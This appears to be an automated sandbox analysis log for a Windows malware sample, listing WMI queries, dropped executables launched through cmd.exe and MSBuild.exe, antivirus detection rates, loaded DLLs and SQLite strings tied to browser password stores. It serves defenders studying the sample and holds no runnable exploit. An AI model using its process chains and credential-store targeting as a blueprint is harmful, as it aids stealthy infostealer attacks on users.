                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6976
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2708
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 552
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1840
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1408
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2268
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7008
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6572
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4416
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5704
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1824
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5268
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6128
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3536
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6552
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5252
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1940
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1364
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5672
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                              Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                              Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                              Source: u3bs.0.exe, u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                              Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                              Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                              Source: AEHIECAFCGDBFHIDBKFC.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                              Source: u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2999882971.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                              Source: TNQTc6Qmkg.exeReversingLabs: Detection: 47%
                              Source: TNQTc6Qmkg.exeVirustotal: Detection: 44%
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile read: C:\Users\user\Desktop\TNQTc6Qmkg.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\TNQTc6Qmkg.exe "C:\Users\user\Desktop\TNQTc6Qmkg.exe"
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.0.exe "C:\Users\user\AppData\Local\Temp\u3bs.0.exe"
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://923204732243015979198396844819192998461207207524972816830460816/
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe"
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.3.exe "C:\Users\user\AppData\Local\Temp\u3bs.3.exe"
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2360
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.0.exe "C:\Users\user\AppData\Local\Temp\u3bs.0.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe "C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess created: C:\Users\user\AppData\Local\Temp\u3bs.3.exe "C:\Users\user\AppData\Local\Temp\u3bs.3.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392Jump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1948,i,6675877024813103109,700328751344061810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe "C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe"
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: msvcr100.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: zipfldr.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: shdocvw.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: winshfhc.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wdscore.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: winshfhc.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wdscore.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: msvcr100.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: mozglue.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: vcruntime140.dllJump to behavior
